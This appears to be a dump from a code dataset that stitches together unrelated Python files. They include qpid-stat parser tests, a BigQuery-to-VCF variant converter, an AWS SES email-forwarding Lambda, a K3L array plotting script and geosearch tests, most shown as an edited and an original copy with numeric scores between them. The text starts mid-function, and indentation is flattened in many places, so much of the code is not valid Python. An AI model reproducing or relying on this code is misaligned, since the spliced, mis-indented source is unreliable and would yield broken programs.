    # Scattered single-column checks on the middle rows.
    assert qpid_list.data[2].get('msg') == '4'
    assert qpid_list.data[3].get('cons') == '0'
    assert qpid_list.data[4].get('bytesIn') == '0'
    # Last row: full column set again.
    assert qpid_list.data[5].get('queue') == 'reserved_resource_worker-7@<EMAIL>.dq'
    assert qpid_list.data[5].get('dur') == 'Y'
    assert qpid_list.data[5].get('autoDel') == 'Y'
    assert qpid_list.data[5].get('excl') == ''
    assert qpid_list.data[5].get('msg') == '0'
    assert qpid_list.data[5].get('msgIn') == '182'
    assert qpid_list.data[5].get('msgOut') == '182'
    assert qpid_list.data[5].get('bytes') == '0'
    assert qpid_list.data[5].get('bytesIn') == '229k'
    assert qpid_list.data[5].get('bytesOut') == '229k'
    assert qpid_list.data[5].get('cons') == '1'
    assert qpid_list.data[5].get('bind') == '2'
    # test iteration: iterating the parser yields the rows in table order
    assert [d['queue'] for d in qpid_list] == [
        '00d6cc19-15fc-4b7c-af3c-6a38e7bb386d:1.0',
        'server.example.com:event',
        'celery',
        'pulp.agent.836a7366-4790-482d-b3bc-efee9d42b3cd',
        'reserved_resource_worker-7@<EMAIL>.celery.pidbox',
        'reserved_resource_worker-7@server.example.com.dq',
    ]
QPID_STAT_U = """
COMMAND> qpid-stat -u --ssl-certificate=/etc/pki/katello/qpid_client_striped.crt -b amqps://localhost:5671
Subscriptions
subscr queue conn procName procId browse acked excl creditMode delivered sessUnacked
===========================================================================================================================================================================================================================
0 00d6cc19-15fc-4b7c-af3c-6a38e7bb386d:1.0 qpid.10.20.1.10:5671-10.20.1.10:33787 celery 21409 CREDIT 2 0
0 pulp.agent.c6a430bc-5ec7-42f8-99ce-f320ed0b9113 qpid.10.20.1.10:5671-10.30.0.148:57423 goferd 32227 Y CREDIT 0 0
1 server.example.com:event qpid.10.20.1.10:5671-10.20.1.10:33848 Qpid Java Client 21066 Y Y WINDOW 2,623 0
0 celeryev.4c77bd03-1cde-49eb-bdc0-b7c38f9ff93d qpid.10.20.1.10:5671-10.20.1.10:33777 celery 21356 Y CREDIT 363,228 0
1 celery qpid.10.20.1.10:5671-10.20.1.10:33786 celery 21409 Y CREDIT 5 0
katello_event_queue katello_event_queue qpid.10.20.1.10:5671-10.20.1.10:33911 ruby 21801 Y CREDIT 7,642 0
""".strip()
def test_qpid_stat_u():
qpid_list = qpid_stat.QpidStatU(context_wrap(QPID_STAT_U))
assert qpid_list.data[0].get('subscr') == '0'
assert qpid_list.data[0].get('queue') == '00d6cc19-15fc-4b7c-af3c-6a38e7bb386d:1.0'
assert qpid_list.data[0].get('conn') == 'qpid.10.20.1.10:5671-10.20.1.10:33787'
assert qpid_list.data[0].get('procName') == 'celery'
assert qpid_list.data[0].get('procId') == '21409'
assert qpid_list.data[0].get('browse') == ''
assert qpid_list.data[0].get('acked') == ''
assert qpid_list.data[0].get('excl') == ''
assert qpid_list.data[0].get('creditMode') == 'CREDIT'
assert qpid_list.data[0].get('delivered') == '2'
assert qpid_list.data[0].get('sessUnacked') == '0'
assert qpid_list.data[1].get('queue') == 'pulp.agent.c6a430bc-5ec7-42f8-99ce-f320ed0b9113'
assert qpid_list.data[1].get('conn') == 'qpid.10.20.1.10:5671-10.30.0.148:57423'
assert qpid_list.data[1].get('acked') == 'Y'
assert qpid_list.data[1].get('procName') == 'goferd'
assert qpid_list.data[2].get('subscr') == '1'
assert qpid_list.data[2].get('queue') == 'server.example.com:event'
assert qpid_list.data[2].get('conn') == 'qpid.10.20.1.10:5671-10.20.1.10:33848'
assert qpid_list.data[2].get('procName') == 'Qpid Java Client'
assert qpid_list.data[2].get('procId') == '21066'
assert qpid_list.data[2].get('browse') == ''
assert qpid_list.data[2].get('acked') == 'Y'
assert qpid_list.data[2].get('excl') == 'Y'
assert qpid_list.data[2].get('creditMode') == 'WINDOW'
assert qpid_list.data[2].get('delivered') == '2,623'
assert qpid_list.data[2].get('sessUnacked') == '0'
assert qpid_list.data[3].get('delivered') == '363,228'
assert qpid_list.data[5].get('subscr') == 'katello_event_queue'
# test iteration
assert [d['queue'] for d in qpid_list] == [
'00d6cc19-15fc-4b7c-af3c-6a38e7bb386d:1.0',
'pulp.agent.c6a430bc-5ec7-42f8-99ce-f320ed0b9113',
'server.example.com:event',
'celeryev.4c77bd03-1cde-49eb-bdc0-b7c38f9ff93d',
'celery',
'katello_event_queue',
] | 0.380068 | 0.27594 |
from typing import Any, Dict, List # pylint: disable=unused-import
from gcp_variant_transforms.beam_io import vcfio
from gcp_variant_transforms.libs.annotation import annotation_parser
from gcp_variant_transforms.libs import bigquery_schema_descriptor # pylint: disable=unused-import
from gcp_variant_transforms.libs import bigquery_util
from gcp_variant_transforms.libs import processed_variant # pylint: disable=unused-import
# Reserved constants for column names in the BigQuery schema.
# Top-level columns mapped onto core Variant attributes; any other top-level
# column is treated as an INFO field by VariantGenerator._get_variant_info.
RESERVED_BQ_COLUMNS = [bigquery_util.ColumnKeyConstants.REFERENCE_NAME,
                       bigquery_util.ColumnKeyConstants.START_POSITION,
                       bigquery_util.ColumnKeyConstants.END_POSITION,
                       bigquery_util.ColumnKeyConstants.REFERENCE_BASES,
                       bigquery_util.ColumnKeyConstants.ALTERNATE_BASES,
                       bigquery_util.ColumnKeyConstants.NAMES,
                       bigquery_util.ColumnKeyConstants.QUALITY,
                       bigquery_util.ColumnKeyConstants.FILTER,
                       bigquery_util.ColumnKeyConstants.CALLS]
# Per-call columns mapped onto core VariantCall attributes; anything else in a
# call record becomes call-level info (see _get_variant_calls).
RESERVED_VARIANT_CALL_COLUMNS = [
    bigquery_util.ColumnKeyConstants.CALLS_SAMPLE_ID,
    bigquery_util.ColumnKeyConstants.CALLS_GENOTYPE,
    bigquery_util.ColumnKeyConstants.CALLS_PHASESET
]
class VariantGenerator():
"""Class to generate variant from one BigQuery row."""
def __init__(self, annotation_id_to_annotation_names=None):
    # type: (Dict[str, List[str]]) -> None
    """Initializes an object of `VariantGenerator`.

    Args:
      annotation_id_to_annotation_names: A map where the key is the annotation
        id (e.g., `CSQ`) and the value is a list of annotation names (e.g.,
        ['allele', 'Consequence', 'IMPACT', 'SYMBOL']). The annotation str
        (e.g., 'A|upstream_gene_variant|MODIFIER|PSMF1|||||') is reconstructed
        in the same order as the annotation names.
    """
    # Helper that turns nested BigQuery annotation records back into
    # pipe-delimited annotation strings (used by _get_variant_info).
    self._annotation_str_builder = annotation_parser.AnnotationStrBuilder(
        annotation_id_to_annotation_names)
def convert_bq_row_to_variant(self, row):
    # type: (Dict[str, Any]) -> vcfio.Variant
    """Converts one BigQuery row to a `vcfio.Variant`.

    Reserved columns map onto the Variant's core attributes; all other
    columns are routed into the variant-level / call-level info dicts by
    the helper methods below.
    """
    return vcfio.Variant(
        reference_name=row[bigquery_util.ColumnKeyConstants.REFERENCE_NAME],
        start=row[bigquery_util.ColumnKeyConstants.START_POSITION],
        end=row[bigquery_util.ColumnKeyConstants.END_POSITION],
        reference_bases=row[bigquery_util.ColumnKeyConstants.REFERENCE_BASES],
        # Alternate bases arrive as repeated records; keep only the ALT string.
        alternate_bases=self._get_alternate_bases(
            row[bigquery_util.ColumnKeyConstants.ALTERNATE_BASES]),
        names=row[bigquery_util.ColumnKeyConstants.NAMES],
        quality=row[bigquery_util.ColumnKeyConstants.QUALITY],
        filters=row[bigquery_util.ColumnKeyConstants.FILTER],
        info=self._get_variant_info(row),
        calls=self._get_variant_calls(
            row[bigquery_util.ColumnKeyConstants.CALLS])
    )
def _get_alternate_bases(self, alternate_base_records):
    # type: (List[Dict[str, Any]]) -> List[str]
    """Extracts the ALT string from each alternate-bases record, in order."""
    return [record[bigquery_util.ColumnKeyConstants.ALTERNATE_BASES_ALT]
            for record in alternate_base_records]
def _get_variant_info(self, row):
    # type: (Dict[str, Any]) -> Dict[str, Any]
    """Collects variant-level INFO fields from a BigQuery row.

    Non-reserved, non-empty top-level columns are copied directly; fields
    nested under each alternate-bases record are accumulated into lists,
    with annotation fields re-serialized into annotation strings.
    """
    info = {}
    # Top-level columns: anything not reserved and non-empty is INFO.
    for key, value in row.items():
        if key not in RESERVED_BQ_COLUMNS and not self._is_null_or_empty(value):
            info.update({key: value})
    # Per-alternate columns: gather values across all alternate records.
    for alt_base in row[bigquery_util.ColumnKeyConstants.ALTERNATE_BASES]:
        for key, value in alt_base.items():
            if (key != bigquery_util.ColumnKeyConstants.ALTERNATE_BASES_ALT and
                not self._is_null_or_empty(value)):
                if key not in info:
                    info[key] = []
                if self._annotation_str_builder.is_valid_annotation_id(key):
                    # Rebuild pipe-delimited annotation strings from the
                    # nested annotation record.
                    info[key].extend(
                        self._annotation_str_builder.reconstruct_annotation_str(
                            key, value))
                else:
                    info[key].append(value)
    return info
def _get_variant_calls(self, variant_call_records):
    # type: (List[Dict[str, Any]]) -> List[vcfio.VariantCall]
    """Builds one `vcfio.VariantCall` per call record.

    Reserved call columns (sample id, genotype, phaseset) become the call's
    core attributes; any other non-empty column goes into the call's info.
    """
    variant_calls = []
    for call_record in variant_call_records:
        info = {}
        for key, value in call_record.items():
            if (key not in RESERVED_VARIANT_CALL_COLUMNS and
                not self._is_null_or_empty(value)):
                info.update({key: value})
        variant_call = vcfio.VariantCall(
            sample_id=call_record[
                bigquery_util.ColumnKeyConstants.CALLS_SAMPLE_ID],
            genotype=call_record[bigquery_util.ColumnKeyConstants.CALLS_GENOTYPE],
            phaseset=call_record[bigquery_util.ColumnKeyConstants.CALLS_PHASESET],
            info=info)
        variant_calls.append(variant_call)
    return variant_calls
def _is_null_or_empty(self, value):
# type: (Any) -> bool
if value is None:
return True
if isinstance(value, list) and not value:
return True
return False | gcp_variant_transforms/libs/bigquery_vcf_data_converter.py | from typing import Any, Dict, List # pylint: disable=unused-import
from gcp_variant_transforms.beam_io import vcfio
from gcp_variant_transforms.libs.annotation import annotation_parser
from gcp_variant_transforms.libs import bigquery_schema_descriptor # pylint: disable=unused-import
from gcp_variant_transforms.libs import bigquery_util
from gcp_variant_transforms.libs import processed_variant # pylint: disable=unused-import
# Reserved constants for column names in the BigQuery schema.
# Top-level columns mapped onto core Variant attributes; any other top-level
# column is treated as an INFO field by VariantGenerator._get_variant_info.
RESERVED_BQ_COLUMNS = [bigquery_util.ColumnKeyConstants.REFERENCE_NAME,
                       bigquery_util.ColumnKeyConstants.START_POSITION,
                       bigquery_util.ColumnKeyConstants.END_POSITION,
                       bigquery_util.ColumnKeyConstants.REFERENCE_BASES,
                       bigquery_util.ColumnKeyConstants.ALTERNATE_BASES,
                       bigquery_util.ColumnKeyConstants.NAMES,
                       bigquery_util.ColumnKeyConstants.QUALITY,
                       bigquery_util.ColumnKeyConstants.FILTER,
                       bigquery_util.ColumnKeyConstants.CALLS]
# Per-call columns mapped onto core VariantCall attributes; anything else in a
# call record becomes call-level info (see _get_variant_calls).
RESERVED_VARIANT_CALL_COLUMNS = [
    bigquery_util.ColumnKeyConstants.CALLS_SAMPLE_ID,
    bigquery_util.ColumnKeyConstants.CALLS_GENOTYPE,
    bigquery_util.ColumnKeyConstants.CALLS_PHASESET
]
class VariantGenerator():
"""Class to generate variant from one BigQuery row."""
def __init__(self, annotation_id_to_annotation_names=None):
    # type: (Dict[str, List[str]]) -> None
    """Initializes an object of `VariantGenerator`.

    Args:
      annotation_id_to_annotation_names: A map where the key is the annotation
        id (e.g., `CSQ`) and the value is a list of annotation names (e.g.,
        ['allele', 'Consequence', 'IMPACT', 'SYMBOL']). The annotation str
        (e.g., 'A|upstream_gene_variant|MODIFIER|PSMF1|||||') is reconstructed
        in the same order as the annotation names.
    """
    # Helper that turns nested BigQuery annotation records back into
    # pipe-delimited annotation strings (used by _get_variant_info).
    self._annotation_str_builder = annotation_parser.AnnotationStrBuilder(
        annotation_id_to_annotation_names)
def convert_bq_row_to_variant(self, row):
    # type: (Dict[str, Any]) -> vcfio.Variant
    """Converts one BigQuery row to a `vcfio.Variant`.

    Reserved columns map onto the Variant's core attributes; all other
    columns are routed into the variant-level / call-level info dicts by
    the helper methods below.
    """
    return vcfio.Variant(
        reference_name=row[bigquery_util.ColumnKeyConstants.REFERENCE_NAME],
        start=row[bigquery_util.ColumnKeyConstants.START_POSITION],
        end=row[bigquery_util.ColumnKeyConstants.END_POSITION],
        reference_bases=row[bigquery_util.ColumnKeyConstants.REFERENCE_BASES],
        # Alternate bases arrive as repeated records; keep only the ALT string.
        alternate_bases=self._get_alternate_bases(
            row[bigquery_util.ColumnKeyConstants.ALTERNATE_BASES]),
        names=row[bigquery_util.ColumnKeyConstants.NAMES],
        quality=row[bigquery_util.ColumnKeyConstants.QUALITY],
        filters=row[bigquery_util.ColumnKeyConstants.FILTER],
        info=self._get_variant_info(row),
        calls=self._get_variant_calls(
            row[bigquery_util.ColumnKeyConstants.CALLS])
    )
def _get_alternate_bases(self, alternate_base_records):
    # type: (List[Dict[str, Any]]) -> List[str]
    """Pulls the ALT string out of every alternate-bases record, in order."""
    alt_key = bigquery_util.ColumnKeyConstants.ALTERNATE_BASES_ALT
    alts = []
    for alt_record in alternate_base_records:
        alts.append(alt_record[alt_key])
    return alts
def _get_variant_info(self, row):
    # type: (Dict[str, Any]) -> Dict[str, Any]
    """Collects variant-level INFO fields from a BigQuery row.

    Non-reserved, non-empty top-level columns are copied directly; fields
    nested under each alternate-bases record are accumulated into lists,
    with annotation fields re-serialized into annotation strings.
    """
    info = {}
    # Top-level columns: anything not reserved and non-empty is INFO.
    for key, value in row.items():
        if key not in RESERVED_BQ_COLUMNS and not self._is_null_or_empty(value):
            info.update({key: value})
    # Per-alternate columns: gather values across all alternate records.
    for alt_base in row[bigquery_util.ColumnKeyConstants.ALTERNATE_BASES]:
        for key, value in alt_base.items():
            if (key != bigquery_util.ColumnKeyConstants.ALTERNATE_BASES_ALT and
                not self._is_null_or_empty(value)):
                if key not in info:
                    info[key] = []
                if self._annotation_str_builder.is_valid_annotation_id(key):
                    # Rebuild pipe-delimited annotation strings from the
                    # nested annotation record.
                    info[key].extend(
                        self._annotation_str_builder.reconstruct_annotation_str(
                            key, value))
                else:
                    info[key].append(value)
    return info
def _get_variant_calls(self, variant_call_records):
    # type: (List[Dict[str, Any]]) -> List[vcfio.VariantCall]
    """Builds one `vcfio.VariantCall` per call record.

    Reserved call columns (sample id, genotype, phaseset) become the call's
    core attributes; any other non-empty column goes into the call's info.
    """
    variant_calls = []
    for call_record in variant_call_records:
        info = {}
        for key, value in call_record.items():
            if (key not in RESERVED_VARIANT_CALL_COLUMNS and
                not self._is_null_or_empty(value)):
                info.update({key: value})
        variant_call = vcfio.VariantCall(
            sample_id=call_record[
                bigquery_util.ColumnKeyConstants.CALLS_SAMPLE_ID],
            genotype=call_record[bigquery_util.ColumnKeyConstants.CALLS_GENOTYPE],
            phaseset=call_record[bigquery_util.ColumnKeyConstants.CALLS_PHASESET],
            info=info)
        variant_calls.append(variant_call)
    return variant_calls
def _is_null_or_empty(self, value):
# type: (Any) -> bool
if value is None:
return True
if isinstance(value, list) and not value:
return True
return False | 0.911468 | 0.276562 |
import email
import json
import logging
import os
import re
import boto3
from botocore.exceptions import ClientError
# FORWARD_MAPPING = {recipient: os.environ.get('MSG_TO_LIST') for recipient in os.environ.get('MSG_TARGET')}
# Static map of recipient address -> comma-separated forward addresses,
# loaded once at import time from a file bundled alongside this module.
with open('mapping.json', 'r') as f:
    FORWARD_MAPPING = json.load(f)
VERIFIED_FROM_EMAIL = os.environ.get('VERIFIED_FROM_EMAIL', '<EMAIL>') # An email that is verified by SES to use as From address.
SUBJECT_PREFIX = os.environ.get('SUBJECT_PREFIX') # label to add to a list, like `[listname]`; not referenced in handler() -- TODO confirm it is still needed
SES_INCOMING_BUCKET = os.environ['SES_INCOMING_BUCKET'] # S3 bucket where SES stores incoming emails (required; KeyError at import if unset).
S3_PREFIX = os.environ.get('S3_PREFIX', '') # optional key prefix, if messages aren't stored at the bucket root
# Module-level AWS clients, created once and reused across invocations.
s3 = boto3.client('s3')
ses = boto3.client('ses')
logger = logging.getLogger(__name__)
logger.setLevel(logging.ERROR) # only error-level records are emitted; the info/warning calls below are suppressed
def handler(event, context):
record = event['Records'][0]
assert record['eventSource'] == 'aws:ses'
o = s3.get_object(Bucket=SES_INCOMING_BUCKET, Key=S3_PREFIX+record['ses']['mail']['messageId'])
raw_mail = o['Body'].read()
logger.info("body: {}".format(type(raw_mail)))
msg = email.message_from_bytes(raw_mail)
logger.info("m: {}".format(msg))
logger.info("keys: {}".format(msg.keys()))
logger.info("from: {}".format(msg['From']))
original_from = msg['From']
del msg['DKIM-Signature']
del msg['Sender']
del msg['Return-Path']
del msg['Reply-To']
del msg['From']
try:
from_email = re.search(r'\<(.*)\>', original_from).group(1)
except:
from_email = None
from_name = re.sub(r'\<.+?\>', '', original_from).strip()
if from_email != None:
msg['Reply-To'] = from_email.strip()
elif re.match(r'.+@.+\..{1,6}', from_name):
msg['Reply-To'] = from_name
else:
msg['Reply-To'] = VERIFIED_FROM_EMAIL
msg['Return-Path'] = VERIFIED_FROM_EMAIL
msg['From'] = from_name + ' <{}>'.format(VERIFIED_FROM_EMAIL)
new_subj = ' '.join([f'{original_from}: ', msg.get('Subject', '')])
del msg['Subject']
msg['Subject'] = new_subj
msg_string = msg.as_string()
for recipient in record['ses']['receipt']['recipients']:
logger.info("recipient: {}".format(recipient))
forwards = FORWARD_MAPPING.get(recipient, '')
if not forwards:
logger.warning('Recipent <{}> is not found in forwarding map. Skipping recipient.'.format(recipient))
continue
for address in forwards.split(','):
logger.info("addr: {}".format(address))
try:
o = ses.send_raw_email(Destinations=[address], RawMessage=dict(Data=msg_string))
logger.info('Forwarded email from <{}> to <{}>. SendRawEmail response={}'.format(recipient, address, json.dumps(o)))
except ClientError as e:
logger.error('Client error while forwarding email for <{}> to <{}>: {}'.format(recipient, address, e)) | handler.py | import email
import json
import logging
import os
import re
import boto3
from botocore.exceptions import ClientError
# FORWARD_MAPPING = {recipient: os.environ.get('MSG_TO_LIST') for recipient in os.environ.get('MSG_TARGET')}
# Static map of recipient address -> comma-separated forward addresses,
# loaded once at import time from a file bundled alongside this module.
with open('mapping.json', 'r') as f:
    FORWARD_MAPPING = json.load(f)
VERIFIED_FROM_EMAIL = os.environ.get('VERIFIED_FROM_EMAIL', '<EMAIL>') # An email that is verified by SES to use as From address.
SUBJECT_PREFIX = os.environ.get('SUBJECT_PREFIX') # label to add to a list, like `[listname]`; not referenced in handler() -- TODO confirm it is still needed
SES_INCOMING_BUCKET = os.environ['SES_INCOMING_BUCKET'] # S3 bucket where SES stores incoming emails (required; KeyError at import if unset).
S3_PREFIX = os.environ.get('S3_PREFIX', '') # optional key prefix, if messages aren't stored at the bucket root
# Module-level AWS clients, created once and reused across invocations.
s3 = boto3.client('s3')
ses = boto3.client('ses')
logger = logging.getLogger(__name__)
logger.setLevel(logging.ERROR) # only error-level records are emitted; the info/warning calls below are suppressed
def handler(event, context):
record = event['Records'][0]
assert record['eventSource'] == 'aws:ses'
o = s3.get_object(Bucket=SES_INCOMING_BUCKET, Key=S3_PREFIX+record['ses']['mail']['messageId'])
raw_mail = o['Body'].read()
logger.info("body: {}".format(type(raw_mail)))
msg = email.message_from_bytes(raw_mail)
logger.info("m: {}".format(msg))
logger.info("keys: {}".format(msg.keys()))
logger.info("from: {}".format(msg['From']))
original_from = msg['From']
del msg['DKIM-Signature']
del msg['Sender']
del msg['Return-Path']
del msg['Reply-To']
del msg['From']
try:
from_email = re.search(r'\<(.*)\>', original_from).group(1)
except:
from_email = None
from_name = re.sub(r'\<.+?\>', '', original_from).strip()
if from_email != None:
msg['Reply-To'] = from_email.strip()
elif re.match(r'.+@.+\..{1,6}', from_name):
msg['Reply-To'] = from_name
else:
msg['Reply-To'] = VERIFIED_FROM_EMAIL
msg['Return-Path'] = VERIFIED_FROM_EMAIL
msg['From'] = from_name + ' <{}>'.format(VERIFIED_FROM_EMAIL)
new_subj = ' '.join([f'{original_from}: ', msg.get('Subject', '')])
del msg['Subject']
msg['Subject'] = new_subj
msg_string = msg.as_string()
for recipient in record['ses']['receipt']['recipients']:
logger.info("recipient: {}".format(recipient))
forwards = FORWARD_MAPPING.get(recipient, '')
if not forwards:
logger.warning('Recipent <{}> is not found in forwarding map. Skipping recipient.'.format(recipient))
continue
for address in forwards.split(','):
logger.info("addr: {}".format(address))
try:
o = ses.send_raw_email(Destinations=[address], RawMessage=dict(Data=msg_string))
logger.info('Forwarded email from <{}> to <{}>. SendRawEmail response={}'.format(recipient, address, json.dumps(o)))
except ClientError as e:
logger.error('Client error while forwarding email for <{}> to <{}>: {}'.format(recipient, address, e)) | 0.332961 | 0.054879 |
import matplotlib
matplotlib.use('Agg')
import matplotlib.pyplot as plt
import sys
import seaborn as sns
import pandas as pd
import scipy.stats as ss
import numpy as np
import random
from collections import defaultdict, OrderedDict
from extract_arrays import extract_arrays, get_refseq, create_random_arrays
import argparse
from itertools import product
def get_counts(arrays, cart_prods, cn=2):
    """
    Count every possible combination of WT (0) and His47Arg (1) copies
    in a population of K3L arrays.

    Parameters:
        arrays: iterable of 0/1 sequences, one per observed array.
        cart_prods: every candidate combination string (e.g. '01'), in the
            order the result should preserve.
        cn: copy number (unused; kept for interface compatibility).

    Returns:
        OrderedDict mapping combination string -> occurrence count,
        ordered as ``cart_prods`` (absent combinations count 0).
    """
    # Tally each observed array once (O(n + m)) instead of rescanning the
    # whole population for every candidate combination (O(n * m)).
    tallies = {}
    for a in arrays:
        key = ''.join(str(x) for x in a)
        tallies[key] = tallies.get(key, 0) + 1
    return OrderedDict((combo, tallies.get(combo, 0)) for combo in cart_prods)
def run(args):
    """Plot, one panel per BAM, the distribution of allele combinations
    among K3L arrays of copy number ``args.cn``.

    Writes the figure to ``args.o`` as EPS (or PNG with ``-png``).
    """
    # Need at least two BAMs: panels are indexed into an axes array, and
    # zero or one input makes that layout degenerate.
    if len(args.bams) < 2:
        # stderr write works identically on Python 2 and 3.
        sys.stderr.write("ERROR: please specify more than 1 BAM\n")
        sys.exit()
    # setting up the figure object
    sns.set_style('ticks')
    f, axarr = plt.subplots(len(args.bams), 1, figsize=(8,10))
    pal = sns.color_palette('Blues', len(args.bams))
    refseq = get_refseq(args.ref)
    for i,bam in enumerate(args.bams):
        name = bam.split('/')[-1].split('.')[0].upper()
        # Extract once and reuse (the original called extract_arrays twice,
        # re-reading the whole BAM).
        extracted = extract_arrays(bam, refseq, copy_filter='hard')
        arrays = extracted.arrays
        # limit analysis to arrays of the specified copy number
        filtered_arrays = [tuple(a) for a in arrays if len(a) == args.cn]
        # determine all possible combinations of alleles in an array of `cn`
        # copy number using cartesian products, ordered by mutant (1) count
        cart_prods = [''.join([str(x) for x in g]) for g in product([0,1], repeat=args.cn)]
        cart_prods = sorted(cart_prods, key=lambda x: x.count('1'))
        # count every instance of these combinations in the sequenced data
        all_combos = get_counts(filtered_arrays, cart_prods, cn=args.cn)
        # count every array of the specified copy number
        total_cn_arrays = float(sum(all_combos.values()))
        x = list(range(len(cart_prods)))
        # fraction of each allele combination in the sequence data; the
        # first/last entries are pure-WT / pure-mutant arrays, so y[1:-1]
        # is the mixed-array fraction annotated on the panel below.
        y = [count / total_cn_arrays for count in all_combos.values()]
        axarr[i].plot(x, y, color=pal[i], marker='o', label='observed')
        axarr[i].text((len(x) - 1) / 4., (np.max(y) - np.min(y)) / 2. + 0.05,
                    'Mixed array fraction {}'.format(round(sum(y[1:-1]), 2)))
        # red guides bracket the mixed-allele combinations
        axarr[i].axvline(1, color='r', ls=':')
        axarr[i].axvline(len(x) - 2, color='r', ls=':')
        axarr[i].tick_params(axis='y', labelsize=12.5, color='k')
        axarr[i].tick_params(axis='x', labelsize=12.5, color='k')
        axarr[i].spines['left'].set_color('k')
        axarr[i].spines['bottom'].set_color('k')
        axarr[i].legend()
        # figure/axis formatting: only the bottom panel gets x tick labels
        if i == len(args.bams) - 1:
            axarr[i].set_xticks(x)
            axarr[i].set_xticklabels(['-'.join(list(c)) for c in cart_prods])
            axarr[i].set_xlabel('Allele combination (0 = $K3L^{WT}$, 1 = $K3L^{His47Arg}$)')
        else:
            axarr[i].get_xaxis().set_visible(False)
        axarr[i].set_title(name)
        for tick in axarr[i].get_xticklabels():
            tick.set_rotation(45)
        if i == 1:
            axarr[i].set_ylabel("Proportion of arrays")
        sns.despine(ax=axarr[i], trim=True)
    if args.png:
        plt.savefig(args.o + '.png', format='png', bbox_inches='tight')
    else:
        plt.savefig(args.o + '.eps', format='eps', bbox_inches='tight')
def main(argv):
    """Parse command-line arguments and invoke the plotting routine.

    Parameters:
        argv: command-line arguments, excluding the program name.
    """
    # argparse is already imported at module level; the original re-imported
    # it locally for no benefit.
    p = argparse.ArgumentParser()
    p.add_argument("--bams", required = True, help='Path to sorted BAM files.', nargs='*')
    p.add_argument("--ref", required = True, help='Path to FASTA reference genome.')
    p.add_argument("-cn", type=int, default=3, help='Plot arrays with this many copies of K3L. (default = 3)')
    p.add_argument("-o", help='Name of output plot.', default='array-combinations')
    p.add_argument('-png', help='Output as png.', action='store_true')
    run(p.parse_args(argv))
if __name__ == "__main__":
import sys
main(sys.argv[1:]) | array_combinations.py | import matplotlib
matplotlib.use('Agg')
import matplotlib.pyplot as plt
import sys
import seaborn as sns
import pandas as pd
import scipy.stats as ss
import numpy as np
import random
from collections import defaultdict, OrderedDict
from extract_arrays import extract_arrays, get_refseq, create_random_arrays
import argparse
from itertools import product
def get_counts(arrays, cart_prods, cn=2):
"""
function to count every possible combination
of WT and His47Arg copies in a population of K3L arrays
"""
all_combos = OrderedDict()
for combo in cart_prods:
count = sum([1 if combo == ''.join([str(x) for x in a]) else 0 for a in arrays])
all_combos[combo] = count
return all_combos
def run(args):
if len(args.bams) == 1:
print >> sys.stderr, "ERROR: please specify more than 1 BAM"
sys.exit()
# setting up the figure object
sns.set_style('ticks')
f, axarr = plt.subplots(len(args.bams), 1, figsize=(8,10))
pal = sns.color_palette('Blues', len(args.bams))
refseq = get_refseq(args.ref)
for i,bam in enumerate(args.bams):
name = bam.split('/')[-1].split('.')[0].upper()
arrays = extract_arrays(bam, refseq, copy_filter='hard').arrays
af = extract_arrays(bam, refseq, copy_filter='hard').af
# limit analysis to arrays of the specified copy number
filtered_arrays = [tuple(a) for a in arrays if len(a) == args.cn]
# determine all possible combinations of alleles in a array of `cn` copy
# number using cartesian products
cart_prods = [''.join([str(x) for x in g]) for g in product([0,1], repeat=args.cn)]
cart_prods = sorted(cart_prods, key=lambda x: x.count('1'))
# count every instance of these combinations in the sequenced data
all_combos = get_counts(filtered_arrays, cart_prods, cn=args.cn)
# count every array of the specified copy number
total_cn_arrays = float(sum(all_combos.values()))
# count the total number of arrays with mixed alleles
total_mixed = float(sum(all_combos.values()[1:-1]))
frac_mixed = total_mixed / total_cn_arrays
x = range(len(cart_prods))
# get the fraction of each allele combination in the sequence data
y = [_ / total_cn_arrays for _ in all_combos.values()]
axarr[i].plot(x, y, color=pal[i], marker='o', label='observed')
axarr[i].text((len(x) - 1) / 4., (np.max(y) - np.min(y)) / 2. + 0.05,
'Mixed array fraction {}'.format(round(sum(y[1:-1]), 2)))
axarr[i].axvline(1, color='r', ls=':')
axarr[i].axvline(len(x) - 2, color='r', ls=':')
axarr[i].tick_params(axis='y', labelsize=12.5, color='k')
axarr[i].tick_params(axis='x', labelsize=12.5, color='k')
axarr[i].spines['left'].set_color('k')
axarr[i].spines['bottom'].set_color('k')
axarr[i].legend()
# figure/axis formatting
if i == len(args.bams) - 1:
axarr[i].set_xticks(x)
axarr[i].set_xticklabels(['-'.join(list(c)) for c in cart_prods])
axarr[i].set_xlabel('Allele combination (0 = $K3L^{WT}$, 1 = $K3L^{His47Arg}$)')
else:
axarr[i].get_xaxis().set_visible(False)
axarr[i].set_title(name)
for tick in axarr[i].get_xticklabels():
tick.set_rotation(45)
if i == 1:
axarr[i].set_ylabel("Proportion of arrays")
sns.despine(ax=axarr[i], trim=True)
if args.png:
plt.savefig(args.o + '.png', format='png', bbox_inches='tight')
else:
plt.savefig(args.o + '.eps', format='eps', bbox_inches='tight')
def main(argv):
import argparse
p = argparse.ArgumentParser()
p.add_argument("--bams", required = True, help='Path to sorted BAM files.', nargs='*')
p.add_argument("--ref", required = True, help='Path to FASTA reference genome.')
p.add_argument("-cn", type=int, default=3, help='Plot arrays with this many copies of K3L. (default = 3)')
p.add_argument("-o", help='Name of output plot.', default='array-combinations')
p.add_argument('-png', help='Output as png.', action='store_true')
run(p.parse_args(argv))
if __name__ == "__main__":
import sys
main(sys.argv[1:]) | 0.320928 | 0.456289 |
import unittest
from app.main.searcher import Search
from app.main.loc_types import Point, PointWithDistance
class TestSearcher(unittest.TestCase):
    """Unit tests for Search: radius ("circle") and rectangle queries over
    geohash-indexed points, including distance ordering and the shared
    geohash-prefix helpers."""
    def test_on_empty_list_circle(self):
        # Searching an empty point list yields an empty result.
        self.assertEqual(Search.search_points(Point("", 46.483264729155586, 30.731506347656254), 3, []), [])
    def test_with_radius_increase_circle(self):
        # Growing the radius around a fixed center sweeps in more points;
        # the expected counts grow monotonically with the radius (meters).
        points = [Point("1.00", 49.86875093132386, -126.63013458251955),
                  Point("1.04", 49.86460165007597, -126.61710977554323),
                  Point("2.04", 49.86512724541457, -126.61693811416627),
                  Point("3.26", 49.86431118704076, -126.61401987075807),
                  Point("4.22", 49.8661784189361, -126.61363363265993),
                  Point("5.45", 49.86283118159863, -126.6121530532837),
                  Point("6.37", 49.86399305885544, -126.61258220672609),
                  Point("7.205", 49.857823724196905, -126.60713195800783)]
        # Radius 0 still matches the point at the center itself.
        self.assertEqual(len(Search.search_points(Point("", 49.86875093132386, -126.63013458251955), 0, points)), 1)
        self.assertEqual(len(Search.search_points(Point("", 49.86875093132386, -126.63013458251955), 1100, points)), 3)
